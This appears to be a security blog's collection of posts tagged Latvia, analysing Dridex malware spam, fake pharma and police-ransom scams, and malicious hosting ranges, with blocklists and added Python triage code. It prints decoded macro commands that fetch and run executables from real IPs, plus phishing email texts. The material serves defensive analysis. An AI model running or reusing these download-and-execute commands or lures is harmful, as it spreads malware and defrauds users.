
Showing posts with label Latvia. Show all posts

Tuesday 17 February 2015

Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment.

Date:    17 February 2015 at 14:05
Subject:    Unpaid invoice [ID:9876543210]

Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are four different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

This combines the recent PowerShell trick with a new one. Instead of downloading an EXE file directly, it downloads a CAB file, dfssk.cab, which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV, Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at 92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:

Monday 16 February 2015

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.

The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are:

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this:

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"

So, these macros are attempting to use PowerShell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)


It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.
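
A triage sketch for the decoded macro strings quoted in the two posts above, added here as an example and not taken from the original blog: it undoes ROT13 when needed, then pulls out the download URL, the staging method (direct EXE or CAB plus expand) and whether the dropped file is executed. The function and field names are assumptions of this example, and the ROT13 input is constructed by re-encoding the page's decoded string.

```python
import codecs
import ipaddress
import re
from urllib.parse import urlparse

# Decoded macro strings copied from the 17 February (CAB) and 16 February (EXE) posts.
CAB_SAMPLE = (
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); "
    r"expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; "
    r"start %TEMP%\JIOiodfhioIH.exe;"
)
EXE_SAMPLE = (
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');"
    r"Start-Process '%TEMP%\JIOiodfhioIH.exe';"
)
# Constructed input: the encoded form is rebuilt here by ROT13-encoding EXE_SAMPLE.
ROT13_SAMPLE = codecs.encode(EXE_SAMPLE, "rot_13")

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
EXPAND_RE = re.compile(r"\bexpand\s+(\S+)\s+([^\s;]+)", re.I)
EXEC_RE = re.compile(r"\b(?:Start-Process|start)\s+'?([^\s;']+)'?", re.I)


def decode_if_rot13(text):
    """ROT13 leaves digits and punctuation alone, so 'http://' shows up as 'uggc://'."""
    lowered = text.lower()
    if "uggc://" in lowered or "cbjrefuryy" in lowered:  # ROT13 of http / powershell
        return codecs.decode(text, "rot_13"), True
    return text, False


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def triage(command):
    """Extract the indicators a responder needs from one macro command string."""
    text, was_rot13 = decode_if_rot13(command)
    download = DOWNLOAD_RE.search(text)
    if not download:
        return {"match": False}
    url, saved_as = download.groups()
    host = urlparse(url).hostname

    # CAB staging: the downloaded file is fed to expand, which writes the real payload.
    expand = EXPAND_RE.search(text)
    staged = bool(expand) and expand.group(1).lower() == saved_as.lower()
    final_path = expand.group(2) if staged else saved_as

    launch = EXEC_RE.search(text)
    executed = launch.group(1) if launch else None
    return {
        "match": True,
        "was_rot13": was_rot13,
        "url": url,
        "host": host,
        "host_is_ip": is_ip_literal(host),
        "saved_as": saved_as,
        "staging": "cab+expand" if staged else "direct",
        "final_path": final_path,
        "executed": executed,
        # True when the file that gets launched is the one that was just fetched/unpacked.
        "runs_download": executed is not None and executed.lower() == final_path.lower(),
        "temp_drop": final_path.upper().startswith("%TEMP%"),
    }


if __name__ == "__main__":
    for sample in (CAB_SAMPLE, EXE_SAMPLE, ROT13_SAMPLE):
        result = triage(sample)
        print(result["host"], result["staging"], result["final_path"],
              "rot13" if result["was_rot13"] else "plain")
```
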

Recommended blocklist:


Friday 13 February 2015

Malware spam: "Remittance XX12345678"

This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:

From:    Gale Barlow
Date:    13 February 2015 at 12:30
Subject:    Remittance IN56583285

Dear Sir/Madam,

I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.

Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.

Gale Barlow
Accounts Manager
4D PHARMA PLC


Boyd Huffman
Accounts Payable
GETECH GROUP 

There is a malicious Word document attached to the email. So far I have only seen one version of this, but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macro which downloads a file from the following location:

http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe

This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identified as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:

85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)

The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempted traffic to nonexistent domains.

Recommended blocklist:




Thursday 1 May 2014

Something evil on 146.185.213.69 and probably the whole /24

146.185.213.69 caught my eye, hosting a number of "ads." subdomains, many of which are tagged by Google as being malicious (highlighted below)


Well, you can probably assume that all those domains are malicious (even without the ads. prefix). But a look at the IP address range was revealing:

inetnum:        146.185.213.0 - 146.185.213.255
netname:        Customer-Valyalov-net
descr:          net for user Valyalov (hosting and VPS)
country:        RU
admin-c:        VME12-RIPE
tech-c:         VME12-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     LIPATOV-MNT
source:         RIPE # Filtered

person:         Valyalov Mikhail Evgenyevich
address:        Sankt-Petersburg, Volynski per., d. 2, lit. A, pom. 12N
phone:          +79099740171
nic-hdl:        VME12-RIPE
mnt-by:         VEROX-MNT
source:         RIPE # Filtered

route:          146.185.213.0/24
descr:          Valyalov-Net @ RN-Data/AltNet datacenter
origin:         AS41390
mnt-by:         LIPATOV-MNT
source:         RIPE # Filtered


The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past, and I tend to lean towards blocking them.

A look at the other contents of the /24 appears [csv] to indicate further suspicious activity, especially f528764d624db129b32c21fbca0cb8d6.com on 146.185.213.53 (mentioned here plus several other places).

So, frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it, plus the following domains:



Thursday 18 April 2013

Malware sites to block 18/4/13, revisited

Quite late last night I posted some malicious IP addresses that I recommend blocking. I've had a chance to look at these more deeply, and some of them are in known bad IP ranges that you should consider blocking.

Most of these IP ranges are in Russia, and blocking them will probably block some legitimate sites. If you don't do much business with Russia then it will probably not be an issue; if you do, then you should exercise caution. There's a plain list at the bottom if you simply want to copy-and-paste.


Detected IP       Recommended block    Owner
5.9.191.179       5.9.191.160/26       (CyberTech LLC, Russia / Hetzner, Germany)
5.45.183.91       5.45.183.91          (Bradler & Krantz, Germany)
5.135.67.215      5.135.67.208/28      (MMuskatov-IE / OVH, France)
5.135.67.217      5.135.67.208/28      (MMuskatov-IE / OVH, France)
23.19.87.38       23.19.87.32/29       (Di & Omano Ltd, Germany / Nobis Technology, US)
37.230.112.83     37.230.112.0/23      (TheFirst-RU, Russia)
46.4.179.127      46.4.179.64/26       (Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.129      46.4.179.64/26       (Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.130      46.4.179.64/26       (Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.135      46.4.179.64/26       (Viacheslav Krivosheev, Russia / Hetzner Germany)
46.37.165.71      46.37.165.71         (BurstNET, UK)
46.37.165.104     46.37.165.104        (BurstNET, UK)
46.105.162.112    46.105.162.112/26    (Shah Sidharth, US / OVH, France)
62.109.24.144     62.109.24.0/22       (TheFirst-RU, Russia)
62.109.26.62      62.109.24.0/22       (TheFirst-RU, Russia)
62.109.27.27      62.109.24.0/22       (TheFirst-RU, Russia)
80.67.3.124       80.67.3.124          (Portlane Networks, Sweden)
80.78.245.100     80.78.245.0/24       (Agava JSC, Russia)
91.220.131.175    91.220.131.0/24      (teterin Igor Ahmatovich, Russia)
91.220.131.178    91.220.131.0/24      (teterin Igor Ahmatovich, Russia)
91.220.163.24     91.220.163.0/24      (Olevan plus, Ukraine)
94.250.248.225    94.250.248.0/23      (TheFirst-RU, Russia)
108.170.4.46      108.170.4.46         (Secured Servers, US)
109.235.50.213    109.235.50.213       (xenEurope, Netherlands)
146.185.255.97    146.185.255.0/24     (Petersburg Internet Network, Russia)
146.185.255.207   146.185.255.0/24     (Petersburg Internet Network, Russia)
149.154.64.161    149.154.64.0/23      (TheFirst-RU, Russia)
149.154.65.56     149.154.64.0/23      (TheFirst-RU, Russia)
149.154.68.145    149.154.68.0/23      (TheFirst-RU, Russia)
173.208.164.38    173.208.164.38       (Wholesale Internet, US)
173.234.239.168   173.234.239.160/27   (End of Reality LLC, US / Nobis, US)
176.31.191.138    176.31.191.138       (OVH, France)
176.31.216.137    176.31.216.137       (OVH, France)
184.82.27.12      184.82.27.12         (Prime Directive LLC, US)
188.93.211.57     188.93.210.0/23      (Logol.ru, Russia)
188.120.238.230   188.120.224.0/20     (TheFirst-RU, Russia)
188.120.239.132   188.120.224.0/20     (TheFirst-RU, Russia)
188.165.95.112    188.165.95.112/28    (Shah Sidharth, US / OVH France)
188.225.33.62     188.225.33.0/24      (Transit Telecom, Russia)
188.225.33.117    188.225.33.0/24      (Transit Telecom, Russia)
192.210.223.101   192.210.223.101      (VPS Ace, US / ColoCrossing, US)
193.106.28.242    193.106.28.242       (Centr Informacionnyh Technologii Online, Ukraine)
193.169.52.144    193.169.52.0/23      (Promobit, Russia)
195.3.145.99      195.3.145.99         (RN Data, Latvia)
195.3.147.150     195.3.147.150        (RN Data, Latvia)
198.23.250.142    198.23.250.142       (LiquidSolutions, Bulgaria / ColoCrossing, US)
198.46.157.174    198.46.157.174       (Warfront Cafe LLC, US / ColoCrossing, US)
205.234.204.151   205.234.204.151      (HostForWeb, US)
205.234.204.190   205.234.204.190      (HostForWeb, US)
205.234.253.218   205.234.253.218      (HostForWeb, US)
213.229.69.40     213.229.69.40        (Poundhost, UK / Simply Transit, UK)

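
An added sanity check for a detected-IP / recommended-block table like the one in this post, not part of the original blog: it parses each recommended block strictly, reports blocks whose address has host bits set (which a firewall may reject or silently re-align), and reports detected IPs that fall outside the block listed beside them. The rows are copied from the table, with follow-on detected IPs grouped under the block on the row above them (an assumption about the original layout); the function names are this example's own.

```python
import ipaddress

# (recommended block, detected IPs) copied from the 18 April 2013 table.
ROWS = [
    ("5.9.191.160/26", ["5.9.191.179"]),
    ("5.135.67.208/28", ["5.135.67.215", "5.135.67.217"]),
    ("46.4.179.64/26", ["46.4.179.127", "46.4.179.129",
                        "46.4.179.130", "46.4.179.135"]),
    ("46.105.162.112/26", ["46.105.162.112"]),
    ("62.109.24.0/22", ["62.109.24.144", "62.109.26.62", "62.109.27.27"]),
    ("188.120.224.0/20", ["188.120.238.230", "188.120.239.132"]),
    ("188.165.95.112/28", ["188.165.95.112"]),
]


def smallest_cover(ips):
    """Smallest single IPv4 network that contains every address in ips."""
    addrs = [int(ipaddress.IPv4Address(ip)) for ip in ips]
    lo, hi = min(addrs), max(addrs)
    # Bits shared by the lowest and highest address form the common prefix.
    prefix = 32 - (lo ^ hi).bit_length()
    return ipaddress.IPv4Network((lo, prefix), strict=False)


def audit(rows):
    """Return a list of findings for misaligned blocks and uncovered IPs."""
    findings = []
    for block, ips in rows:
        try:
            net = ipaddress.ip_network(block, strict=True)
        except ValueError:
            # Host bits set: show what a lenient parser would actually block.
            net = ipaddress.ip_network(block, strict=False)
            findings.append({"block": block, "issue": "host bits set",
                             "parsed_as": str(net)})
        missed = [ip for ip in ips if ipaddress.ip_address(ip) not in net]
        if missed:
            findings.append({"block": block,
                             "issue": "detected IPs outside block",
                             "missed": missed,
                             "smallest_cover": str(smallest_cover(ips))})
    return findings


if __name__ == "__main__":
    for finding in audit(ROWS):
        print(finding)
```
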

Monday 11 February 2013

"Support Center" spam / phticker.com

Not malware this time, but this fake "Support Center" spam leads to a fake pharma site at phticker.com:

Date:      Mon, 11 Feb 2013 06:13:52 -0700
From:      "Brinda Wimberly" [noreply@mdsconsulting.be]
Subject:      Support Center

    Welcome to Help Support Center

Hello,

You have been successfully registered in our Ticketing System

Please, login and check status of your ticket, or report new ticket here

See All tickets
   
Go To Profile

This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.

The site appears to be clean from a malware perspective and is hosted on 171.25.190.246 (Verus AS, Latvia) along with these other fake pharma sites:


Saturday 9 June 2012

IMDB "Your password is too weak" spam / thepharmhealth.com

This spam leads to a fake pharma site at thepharmhealth.com:

Date:      Sat, 9 Jun 2012 18:20:35 -0700 (PDT)
From:      IMDb User Protection [do-not-reply-here@imdb.com]
Subject:      Your password is too weak

This is an automatic message from the Internet Movie Database (IMDb) registration system.
Our system detected your password is too weak. Short passwords are easy to guess.

Please follow this link :

https://secure.imdb.com/password_update/imdb/74129625140408804050

If you used your IMDb password at any other sites, you'll need to change those passwords as well.

Regards,
IMDb User Protection help
http://imdb.com/register/

It's an interesting and novel approach, and it could easily be adapted for malware rather than fake prescriptions. thepharmhealth.com is hosted on 80.232.131.201 (SIA Lattelecom, Latvia).

Friday 27 April 2012

"Amazon.com Password Assistance" spam / healthcarewelbizness.com

The fake pill pushers are getting inventive. This spam leads to a fake pharma site on healthcarewelbizness.com:

Date:      Fri, 27 Apr 2012 04:47:10 +0000 (UTC)
From:      "Amazon.com" [account-update@amazone.com]
Subject:      Amazon.com Password Assistance

We received a request to reset the password associated with this e-mail address. Please follow the instructions below.

Click the link below to complete or cancel request using our secure server:

https://www.amazon.com/ap/forgotpassword?arb=cf4c17ba-4659-06c6-ff0f-58f6e8b50a66

If clicking the link doesn't seem to work, you can copy and paste the link into your browser's address window, or retype it there.

Amazon.com will never e-mail you and ask you to disclose or verify your Amazon.com password, credit card, or banking account number. Thanks for visiting Amazon.com!

healthcarewelbizness.com is hosted on 46.183.216.215 (Dataclub, Latvia) along with a whole load of other toxic websites that are best avoided.

Thursday 15 December 2011

NACHA Spam / evrymonthnighttry.com and glasseseverydaynow.com

More NACHA-themed spam this morning that redirects victims through a hacked legitimate site to a malware-laden page, this time hosted on evrymonthnighttry.com or glasseseverydaynow.com.

These sites are hosted on 46.183.217.119 (Dataclub, Latvia). I can't see anything at all of value in 46.183.216.0/21 so blocking access to all of that range might be prudent.

It also attempts to load an exploit from a site called bbb-complains.org which is not resolving at present.

A couple of example emails:

Date:      Thu, 15 Dec 2011 07:42:51 +0000
From:      "risk.manager@nacha.org" [risk.manager@nacha.org]
Subject:      Your ACH transaction details

Attention: Accounting Department

This message includes an important information regarding the ACH debit transfer sent on your behalf, that was detained by our bank:
Transaction ID:    079788807282357
Transaction status:    pending

In order to resolve this matter, please use the link below to review the transaction details as soon as possible.

Yours faithfully,
Anthony Cooley
Chief Accountant

and

Date:      Thu, 15 Dec 2011 07:30:43 +0000
From:      "alert@nacha.org" [alert@nacha.org]
Subject:      Your pending ACH debit transfer

Dear Sir or Madam,

Please find below a report about the ACH debit transfer sent on your behalf, that was kept back by our bank:
Transaction #:    638798200851317
Status of the transaction:    pending

In order to resolve this matter, please review the transaction details using the link below as soon as possible.

Yours truly,
Kevin Hunt
Chief Accountant

Monday 10 October 2011

Some TDL/TDSS rootkit sites to block

The following IPs are related to the TDL/TDSS rootkit. 212.36.9.52 / gic-kbmtu0zkvwylf.com appears to be a C&C server.


94.63.149.0/24 is a Romanian host called Eurolan Solutions SRL; I've had this blocked for months with no ill effects. 146.185.0.0/16 is Petersburg Internet Network Ltd in Russia; the whole /16 is sparsely populated and blocking it would probably do no harm. 195.3.144.0/22 is the Latvian host RN Data SIA; given that Latvian hosts are such a sewer, blocking the /22 is probably also a good idea.

As for 212.36.9.52 (OTEL, Bulgaria), there appear to be a few malware servers in 212.36.8.0/23 mixed with several legitimate sites. 212.36.9.60, 212.36.9.52 and 212.36.9.52 also appear to be malicious. Blocking 212.36.0.48/28 should filter out the bad sites without blocking good ones.

The following domains are associated with these IPs. If you can't block by IP then blocking these might be a good idea:


Wednesday 14 September 2011

Some fake Bundeskriminalamt and Bundespolizei sites

Here are some more fake sites pretending to be the Bundeskriminalamt and Bundespolizei (agencies of the German Federal Police) which are probably worth blocking, following on from these.

193.105.240.204 [Sia Vps Hosting, Latvia]
bundespolizei-de.net
bundespolizei-de.org
bundespolizei-online.com
dpolg-bundespolizei.org
inter-bundeskriminalamt.org

77.87.229.14 [Invalid pointer to bundespolizei.de]
inter-bundeskriminalamt.eu
dpolg-bundespolizei.org [also on 193.105.240.204]
inter-bundeskriminalamt.org [also on 193.105.240.204]

211.154.153.49 [China Motion Network Communication]
agentbundeskriminalamt.net
bundeskriminalamtde.net
onlinebundeskriminalamt.net
torrentbundeskriminalamt.net

Note that 77.87.229.14 is actually the real IP for bundespolizei.de, but the scammers are pointing their DNS records to it, presumably to cause confusion.

You can safely block access to 193.105.240.0/24 (Sia VPS) without much fear of losing anything important. The Chinese netblock is more mixed, but blocking at least 211.154.153.49 might be a good idea if you are in Germany.

Monday 12 September 2011

bundespolizei-online.com is not the Bundespolizei

bundespolizei-online.com is a fake domain pretending to be the Bundespolizei (German Federal Police). It appears to be part of a malware scam that has been around for a while, where the victim is told that they have done something illegal and need to pay a fine to the police.

The text of the message might vary, but the last scam domain was used in conjunction with a message that read:

Es ist ungesetzliche Tätigkeit enthüllt
Achtung!!!
Ein Vorgang illegaler Aktivitäten wurde erkannt.
Das Betriebssystem wurde im Zusammenhang mit Verstoßen gegen die Gesetze der Bundesrepublik Deutschland gesperrt! Es wurde folgender Verstoß festgestelltt: Ihre IP Adresse lautet "x.x.x.x" mit dieser IP wurden Seiten mit pornografischen Inhalten,Kinderpornographie, Sodomie und Gewalt gegen Kinder aufgerufen Auf Ihrem Computer wurden ebenfalls Videodateien mit pornografischen Inhalten, Elementen von Gewalt und Kinderpornografie festgestellt! Es wurden auch Emails in Form von Spam, mit terroristischen Hintergründen, verschickt. Diese Sperre des Computers dient dazu, Ihre illegalen Aktivitäten zu unterbinden.
Ihre IP: x.x.x.x
Location: XXXXX
ISP: XXXXX
Um die Sperre des Computers aufzuheben, sind Sie dazu verflichtet eine Strafe von 100 Euro zu zahlen. Sie haben zwei Möglichkeiten die Zahlung von 100 Euro zu leisten.

    1) Die Zahlung per Ukash begleichen:
    Dazu geben Sie bitte den erworbenen Code in das Zahlungsfeld ein und drücken Sie anschliessend auf OK (haben Sie mehrere Codes,so geben Sie Diese einfach nacheinander ein und drücken Sie anschliessend auf OK) Sollte das System Fehler melden,so müssen Sie den Code per Email (einzahlung@dpolg-bundespolizei.org) versenden.
    2) Die Zahlung per Paysafecard begleichen:
    Dazu geben Sie bitte den erworbenen Code (gegebenfalls inkl. Passwort) in das Zahlungsfeld ein und drücken Sie anschliessend auf OK (haben Sie mehrere Codes,so geben Sie Diese einfach nacheinander ein und drücken Sie anschliessend auf OK) Sollte das System Fehler melden,so müssen Sie den Code per Email(einzahlung@dpolg-bundespolizei.org) versenden.

This roughly translates as:

It is illegal activity revealed
Attention!
An operation of illegal activity has been detected.
The operating system was blocked in connection with Violating the laws of the Federal Republic of Germany! It was festgestelltt following violation: Your IP address is "xxxx" with the IP were pages containing pornography, child pornography, bestiality and violence invoked against children on the computer were also video files containing pornography, found elements of violence and child pornography! There were also emails sent in the form of spam, with terrorist backgrounds. This serves to lock the computer to stop your illegal activities.
Your IP: x.x.x.x
Location: XXXXX
ISP: XXXXX
To unlock the computer, you have to pay a penalty verflichtet of 100 €. You have two ways to make the payment of 100 €.

     1 pay) Payment via Ukash:
     You enter the acquired code into the payment box and then press OK (you have multiple codes, enter this simply a sequence, then press OK) If the system is wrong, you have the code by email (einzahlung@dpolg-bundespolizei.org) ship.
     2) The payment by paysafecard to pay:
     You enter the acquired code (if necessary including password) into the payment box and then press OK (you have multiple codes, enter this simply a sequence, then press OK) If the system is wrong, so you must send the code by email (einzahlung@dpolg-bundespolizei.org).

A €100 fine for terrorist links and downloading child pornography? Obviously this is nonsense, but the victim might well try to pay to get rid of the trojan.

The bundespolizei-online.com domain is quite interesting to look at. First, there is the WHOIS record:

    Steffen Schüssler
    Email: t-mart-admin@teiekom.de
    Organization: Hostmaster T-Systems
    Address: Vahrenwalder Strasse 240-247
    City: Hannover
    State: Hannover
    ZIP: 30159
    Country: DE
    Phone: +49.43171633486
    Fax: +49.43171633486

It looks legitimate enough. T-Systems is the hosting division of Deutsche Telekom, and the email address looks legitimate at first glance.. but wait, it says teiekom.de and not telekom.de which can't be right.

The domain is registered through the Russian registrar Regtime Ltd. The site bundespolizei-online.com is hosted on 193.105.240.204 in Latvia. Latvia is pretty much a hotbed of crime, and the AS12578 block has a pretty bad reputation, and the whole 193.105.240.0/24 range looks quite toxic. As is common with malicious sites such as this, all the mail is handled by Google.

So.. if you see a message soliciting an email reply to bundespolizei-online.com or running on the same website then it is malware, and you should try to disinfect your machine using up-to-date antivirus software, or you could try following the instructions here.

Thursday 23 June 2011

Peteris Sahurovs and Marina Maslobojeva arrested: Sagade hopefully busted

Another victory for the good guys, according to El Reg.

The Department of Justice and the FBI have cracked an international scareware ring believed to have scammed over $72m (£45m).

The gang screwed money out of more than a million victims. They installed software on their computers which falsely claimed to have detected viruses or malware. The gang then took payment for supposedly cleaning up the machines.

22-year-old Peteris Sahurovs and 23-year-old Marina Maslobojeva were arrested in Latvia on charges made in court in Minnesota.

Although there are several bad hosts in Latvia, the one that really stands out is Sagade Ltd. And it looks very much as if Peteris Sahurovs worked for Sagade: his screen name on the internet was piotrek89, which was also the abuse address for the Sagade network.

Sagade seemed to be linked to a number of other Latvian outfits, so hopefully this will make a major dent in malicious activity from that country. Until it gets cleaned up though, Latvian netblocks should still be treated with suspicion.

The FBI have a press release about it here.

Monday 7 March 2011

Evil network: Sagade Latvia AS52055 (46.252.130.0/23) and traff4you.info

I've covered Sagade before, which appears to be a completely black hat web host with no legitimate domains at all. Sagade appear to have a new IP range, 46.252.130.0 - 46.252.131.255, which is completely full of toxic sites that should be blocked.

This IP range forms AS52055, of which Google says:

Safe Browsing
Diagnostic page for AS52055 (RELIKT)

What happened when Google visited sites hosted on this network?

    Of the 159 site(s) we tested on this network over the past 90 days, 9 site(s), including, for example, opanaw.com/, videospartyh.info/, galleryhotf.info/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2011-02-23, and the last time suspicious content was found was on 2011-02-23.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 16 site(s) on this network, including, for example, welcometotheglobalisnet.com/, 46.252.129.0/, welcometotheglobaliscom.com/, that appeared to function as intermediaries for the infection of 507 other site(s) including, for example, ctwatchdog.com/, deewanapan.com/, thedailyherald.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 55 site(s), including, for example, 46.252.129.0/, sontollones.co.cc/, toney.co.cc/, that infected 2312 other site(s), including, for example, cmsocial.com/, mediafire.com/, aotsargentina.org.ar/.

SiteVet oddly shows the AS as being offline, but the accompanying "badness" chart shows a big leap in evilness since the beginning of the year, so perhaps the block was reallocated.

As well as .com domains and the like, the block hosts several hard-to-spot .cz.cc and .vv.cc domains which host malware, much of which is being distributed through an apparently bogus ad network at traff4you.info.

So far, I can see the following domains in the block (a list with IP addresses and MyWOT ratings can be downloaded from here):


Registration details for this block are:

inetnum:        46.252.130.0 - 46.252.131.255
netname:        Sagade
descr:          users
country:        LV
admin-c:        AK6804-RIPE
tech-c:         AK6804-RIPE
status:         ASSIGNED PA
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

person:         Andrejs Kaminskis
address:        Latgales 32/34, Rezekne, Latvia
phone:          +37127580487
e-mail:         reliktbvk@gmail.com
nic-hdl:        AK6804-RIPE
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

route:          46.252.130.0/23
descr:          users
origin:         AS52055
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

As I said, traffic seems to be fed through traff4you.info, registered on 10th December 2010 with anonymous registration details and currently hosted on a dedicated server at 206.161.200.11, but until recently it was on a shared server on 69.65.48.218. This is probably a good domain to block, and I can't see much harm in blocking access to 206.161.200.0/24 and 69.95.48.0/24 while you're at it too.

Thursday 21 October 2010

Evil network: DG Holding SIA / ALTNET-LV AS41390 (195.3.144.0/22)

DG Holding SIA / ALTNET-LV is another evil network, and it's no surprise to see that it is in Latvia. The 195.3.144.0/22 hosts sites involved in hacking, malware distribution, MLM scams, fake goods and porn plus a number of ZeuS C&C servers.

There are a small number of legitimate customers in this block, but they mostly cater for Latvian users only.. if you are outside of Latvia, then very little will be lost by blocking this entire /22 (195.3.144.0 - 195.3.147.255).

There's a listing of domains, IPs and MyWOT ratings here [csv] if you want to probe more deeply and avoid blocking the handful of legitimate sites.. otherwise, I would recommend blocking the lot.

Monday 11 October 2010

[Updated] Evil network: Donstroy Ltd AS29557 (194.8.250.0/23)

UPDATE: this IP range is now used by a completely different organisation; the malicious activity no longer exists and the block is safe to use. However, the post will remain up for research purposes.

Another network worth blocking, Donstroy Ltd appears to be a Latvian entity hosting in Moldova, closely affiliated with Sagade Ltd, who are one of the most scummy networks around at the moment.

The WHOIS details show a tell-tale link to Sagade in the email address:

inetnum:         194.8.250.0 - 194.8.251.255
netname:         Donstroy-1
descr:           Donstroy Ltd.
country:         LV
org:             ORG-DL107-RIPE
admin-c:         JS1050
tech-c:          JS1050
status:          ASSIGNED PI
